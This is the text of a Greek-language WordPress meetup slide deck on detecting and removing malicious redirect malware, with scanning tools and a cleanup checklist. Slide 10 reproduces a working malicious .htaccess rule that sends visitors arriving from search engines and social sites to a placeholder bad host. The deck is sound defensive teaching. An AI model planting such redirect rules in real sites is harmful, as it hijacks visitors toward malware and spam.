Slide 1
Slide 1 text
Gerasimos Mourelatos
WordPress Security Aficionado
“… there are only two types of companies: those
that have been hacked and those that will be.”
Robert Mueller,
FBI Director, 2012
@makismour
Slide 2
Slide 2 text
16th WordPress
Athens Meetup
Εντ
οπισμός και Αφαίρεση Malware Redirect
Slide 3
Slide 3 text
source: internetlivestats.com
Slide 4
Slide 4 text
FACTS
source: codeinwp.com/blog/wordpress-statistics
Το WordPress έχει τις περισσότερες παραβιάσεις
από hackers, αυτό όμως δεν σημαίνει ότι είναι και το
πιο ευάλωτο.
TimThumb, Revslider & Gravity Forms είναι από τα
αγαπημένα plugin όσων θέλουν να παραβιάσουν μια
WordPress ιστοσελίδα.
Μία από τις πιο συνηθισμένες παραβιάσεις είναι τα
malicious ή malware redirects.
Slide 5
Slide 5 text
MALWARE REDIRECT FIVE Ws
Who
What
Where
When
Why
Ένας ή περισσότεροι hacker
H WordPress ιστοσελίδα σας κάνει redirect σε
μια άλλη -ξένη- ιστοσελίδα
.htaccess, theme files, plugin files
Όταν εσείς κοιμόσαστε!!!
Blackhat SEO, Drive by Download
Slide 6
Slide 6 text
1. WORDPRESS WEBSITE SCAN
Hosting Provider
Quttera
Virus Total
Web Inspector
Slide 7
Slide 7 text
2. CLOAKING
ΕΛΕΓΧΟΣ ΓΙΑ
Fetch Google
ΒotSimulator
Slide 8
Slide 8 text
3. GOOGLE SITE STATUS
ΕΛΕΓΧΟΣ
Slide 9
Slide 9 text
4. MALWARE
ΕΝΤΟΠΙΣΜΟΣ
.htaccess located at root
& uploads dir
wp-config.php
theme’s
header.php
footer.php
functions.php
Slide 10
Slide 10 text
.HTACCESS
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .twitter. [OR]
RewriteCond %{HTTP_REFERER} .blog. [OR]
RewriteCond %{HTTP_REFERER} .live. [OR]
RewriteCond %{HTTP_REFERER} .myspace. [OR]
RewriteCond %{HTTP_REFERER} .linkedin. [OR]
RewriteRule .* http://badsite.co/bad.php?m=123 [R,L]
Slide 11
Slide 11 text
WP-CONFIG.PHP
Slide 12
Slide 12 text
THEME'S HEADER.PHP
Slide 13
Slide 13 text
THEME'S FOOTER.PHP
Slide 14
Slide 14 text
MALWARE
ΑΦΑΙΡΕΣΗ
Slide 15
Slide 15 text
BACKUP!!!!!
Αφαίρεση και εκ νέου εγκατάσταση WordPress
Αφαίρεση και εκ νέου εγκατάσταση όλων των theme
Αφαίρεση και εκ νέου εγκατάσταση όλων των plugin
MALWARE
ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ
Slide 16
Slide 16 text
Έλεγχος όλων των admin users
Έλεγχος και διαγραφή όλων των μη WordPress
αρχείων και directory
Επανάληψη της διαδικασίας σε όλες της
ιστοσελίδες που ανήκουν στον ίδιο hosting account
MALWARE
ΤΟ ΚΡΥΒΕΤΑΙ ΣΤΙΣ ΛΕΠΤΟΜΕΡΕΙΕΣ
Slide 17
Slide 17 text
●
https://wordpress.org/about/security/
●
https://malwaredecoder.com/
●
https://quttera.com/
●
https://www.virustotal.com
●
https://app.webinspector.com/
●
https://www.google.com/webmasters/tools/googlebot-
fetch
●
https://transparencyreport.google.com/safe-browsing/
search
●
https://www.linkedin.com/in/makismour/
USEFUL RESOURCES
Slide 18
Slide 18 text
No content